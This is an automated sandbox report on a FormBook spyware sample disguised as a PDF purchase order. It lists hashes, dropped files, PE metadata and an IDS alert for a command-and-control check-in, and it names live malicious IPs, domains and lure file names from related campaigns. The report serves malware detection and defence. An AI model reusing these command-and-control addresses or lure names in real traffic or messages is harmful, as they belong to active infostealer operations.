Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO-000172483 pdf.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@15/10@5/3
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 96% Number of executed functions: 133 Number of non-executed functions: 277
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.56.254.164, 13.107.246.45, 20.12.23.50
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target ycnUEzgloE.exe, PID 1896 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:48:01	API Interceptor	1x Sleep call for process: PO-000172483 pdf.exe modified
06:48:03	API Interceptor	12x Sleep call for process: powershell.exe modified
06:49:34	API Interceptor	65482x Sleep call for process: cttune.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
194.9.94.85	Order.exe	Get hash	malicious	FormBook	Browse	www.deeplungatlas.org/57zf/
	SDBARVe3d3.exe	Get hash	malicious	FormBook	Browse	www.deeplungatlas.org/57zf/
	Payment Advice.exe	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/4hda/
	proforma invoice.exe	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/4hda/
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/4hda/
	shipping documents.exe	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/4hda/
	MV Sunshine, ORDER.exe	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/4hda/
	PAYROLL SUMMARY _pdf.exe	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/4hda/
	docs_pdf.exe	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/4hda/
	TOgpmvvWoj.exe	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/4hda/
172.67.131.144	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	www.jyshe18.buzz/1lpi/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.milp.store	new.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
www.milp.store	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
natroredirect.natrocdn.com	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	SW_48912.scr.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	new.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
www.jyshe18.buzz	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	172.67.131.144

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://www.hillviewlodge.hotelrent.top	Get hash	malicious	Unknown	Browse	104.18.86.42
	proforma invoice pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	ungziped_file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	fatura098002.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	random.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Q1 Statements.html	Get hash	malicious	Unknown	Browse	104.18.95.41
	174.exe	Get hash	malicious	Xmrig	Browse	104.21.95.99
	https://www.dollartip.info/unsubscribe/?d=mdlandrec.net	Get hash	malicious	Unknown	Browse	172.66.0.227
	https://wetransfert-devis-factgfd.mystrikingly.com/	Get hash	malicious	Unknown	Browse	104.17.25.14
	spreadmalware.exe	Get hash	malicious	XWorm	Browse	104.21.32.1
CIZGITR	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	rHP_SCAN_DOCUME.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	SW_48912.scr.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	94.73.166.16
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	new.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
LOOPIASE	new.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
	Hire P.O.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
	Order.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	SDBARVe3d3.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	http://tokenpuzz1le.com/	Get hash	malicious	HTMLPhisher	Browse	194.9.94.86
	Payment Advice.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	proforma invoice.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	shipping documents.exe	Get hash	malicious	FormBook	Browse	194.9.94.85

Process:	C:\Users\user\Desktop\PO-000172483 pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:ML9E4KiE4Kx1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	8B21C0FDF91680677FEFC8890882FD1F
SHA1:	E15AC7685BFC89F63015C29DE7F6BCE7A1A9F0E7
SHA-256:	E2F188397C73C8150EE6F09E833E4D1ABA01293CCFDFED61981F5F66660731F9
SHA-512:	1EFDF56115A8688CA2380F3047A28CA3E03C74369C3A377050066A56B8171AD756F7DD7AA29F5648A84D16812D1B422749259ED47447713E9B3A0834CE361BE7
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1172
Entropy (8bit):	5.356731422178564
Encrypted:	false
SSDEEP:	24:3CytZWSKco4KmZjKbmOIKod6emZ9tYs4RPQoUEJ0gt/NKIl9iagu:yyjWSU4xympjmZ9tz4RIoUl8NDv
MD5:	36204EC3BBBDD36D0ADB61D77F70AFA6
SHA1:	2F7D16D4F9510B3787284ACE833A441F322521BB
SHA-256:	AFF976F94D625B8CF86B65471B6751F22C9956A017CD785E7258006D02506FB5
SHA-512:	E7B1591C6ECDCFD4CCAF971AEF50FA8E610A92AC98C65B362E8F9CCCB604426BE229C6C2D4CF2E48F134039EDBAC2FBF8CE95EC9C03CBD0E353E869B6CC49E6C
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\--cG1-69-

Download File

Process:	C:\Windows\SysWOW64\cttune.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ughpzhk.nle.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gsdjczie.sgx.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ibl31a5g.5ot.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jemiyayw.rnw.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\System32\wbem\Performance\WmiApRpl_new.h

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3444
Entropy (8bit):	5.011954215267298
Encrypted:	false
SSDEEP:	48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
MD5:	B133A676D139032A27DE3D9619E70091
SHA1:	1248AA89938A13640252A79113930EDE2F26F1FA
SHA-256:	AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
SHA-512:	C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
Malicious:	false
Preview:	//////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (369), with CRLF line terminators
Category:	modified
Size (bytes):	25520
Entropy (8bit):	3.5693825676922697
Encrypted:	false
SSDEEP:	384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4j:esozozBg4Lg4ung4j
MD5:	07E9048B489B126DCF015FDBB328DA0C
SHA1:	00B0904E1E47C7FF08CE5564C80D21CEEB078281
SHA-256:	6C1FC8C7643A215B5AF437A81FDB90A6A2E2627C8421DC4F76BFB4932616FF7D
SHA-512:	C8EB08CEC570CD7DC86935E398EA31BB0A86CC0D2E84E034EEAFD7A87E8D07AF856079958158EAD66F1ABF3770DF051079B1132086D039561B8A3C0346E5D099
Malicious:	false
Preview:	.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.

C:\Windows\system32\wbem\Performance\WmiApRpl.h (copy)

Download File

Process:	C:\Windows\System32\wbem\WMIADAP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3444
Entropy (8bit):	5.011954215267298
Encrypted:	false
SSDEEP:	48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
MD5:	B133A676D139032A27DE3D9619E70091
SHA1:	1248AA89938A13640252A79113930EDE2F26F1FA
SHA-256:	AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
SHA-512:	C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
Malicious:	false
Preview:	//////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.57083520260864
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	PO-000172483 pdf.exe
File size:	905'216 bytes
MD5:	129fde986d0f28d1d4dc333fd8a97478
SHA1:	49c21bd7147370d2d6c751c9f3b4cb02077df6ed
SHA256:	2143e9fe2cf7658859b05fb300e58e293da9f0872219ff8e00bfa80435534378
SHA512:	9026382b3de2ac69a40876a534f4cf06422499831c513c65298035efc11824a7fe18cfdb56a555c2f94b20395ef3716592dce093342a2d7cc764e11e16cf6700
SSDEEP:	24576:pU99GRgReyHcR3h7Oesc45vBcz87ZW2lfZi7+:p8ZIEiRTr45vqQ71l
TLSH:	2A159D092356E4CED0D745BC5893FFB791004D494622C2C247EEBAAB369B98EB90F1D7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T.}g..............0.................. ........@.. ....................... ............`................................

File Icon


Icon Hash:	13294d96922b2b0f

Static PE Info

General

Entrypoint:	0x4dd1de
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x677D0454 [Tue Jan 7 10:39:16 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xdd184	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xde000	0x1968	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xdb1e4	0xdb200	f5f976b27bf857dd1c60308d0f534612	False	0.8179515919138619	data	7.581091963671599	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xde000	0x1968	0x1a00	030f7652a727c214bb187724c2b78cc3	False	0.6527944711538461	data	6.0017370048648635	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe0000	0xc	0x200	f44e82896b62f605648b626aa5d1ea12	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xde118	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.8129432624113475
RT_ICON	0xde580	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.7136491557223265
RT_GROUP_ICON	0xdf628	0x22	data	0.9411764705882353
RT_VERSION	0xdf64c	0x31c	data	0.43090452261306533

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-08T12:49:37.048599+0100	2856318	ETPRO MALWARE FormBook CnC Checkin (POST) M4	1	192.168.2.5	57576	194.9.94.85	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 12:48:21.004980087 CET	57323	53	192.168.2.5	1.1.1.1
Jan 8, 2025 12:48:21.009833097 CET	53	57323	1.1.1.1	192.168.2.5
Jan 8, 2025 12:48:21.009963036 CET	57323	53	192.168.2.5	1.1.1.1
Jan 8, 2025 12:48:21.017611980 CET	53	57323	1.1.1.1	192.168.2.5
Jan 8, 2025 12:48:21.459153891 CET	57323	53	192.168.2.5	1.1.1.1
Jan 8, 2025 12:48:21.464179039 CET	53	57323	1.1.1.1	192.168.2.5
Jan 8, 2025 12:48:21.464245081 CET	57323	53	192.168.2.5	1.1.1.1
Jan 8, 2025 12:49:11.627589941 CET	57575	80	192.168.2.5	85.159.66.93
Jan 8, 2025 12:49:11.632452965 CET	80	57575	85.159.66.93	192.168.2.5
Jan 8, 2025 12:49:11.632567883 CET	57575	80	192.168.2.5	85.159.66.93
Jan 8, 2025 12:49:11.642894983 CET	57575	80	192.168.2.5	85.159.66.93
Jan 8, 2025 12:49:11.647684097 CET	80	57575	85.159.66.93	192.168.2.5
Jan 8, 2025 12:49:12.400077105 CET	80	57575	85.159.66.93	192.168.2.5
Jan 8, 2025 12:49:12.400173903 CET	80	57575	85.159.66.93	192.168.2.5
Jan 8, 2025 12:49:12.400418997 CET	57575	80	192.168.2.5	85.159.66.93
Jan 8, 2025 12:49:12.404094934 CET	57575	80	192.168.2.5	85.159.66.93
Jan 8, 2025 12:49:12.408879995 CET	80	57575	85.159.66.93	192.168.2.5
Jan 8, 2025 12:49:36.398550034 CET	57576	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:36.412522078 CET	80	57576	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:36.412616968 CET	57576	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:36.427891016 CET	57576	80	192.168.2.5	194.9.94.85
Jan 8, 2025 12:49:36.432800055 CET	80	57576	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:37.048471928 CET	80	57576	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:37.048495054 CET	80	57576	194.9.94.85	192.168.2.5
Jan 8, 2025 12:49:37.048505068 CET	80	57576	194.9.94.85	192.168.2.5
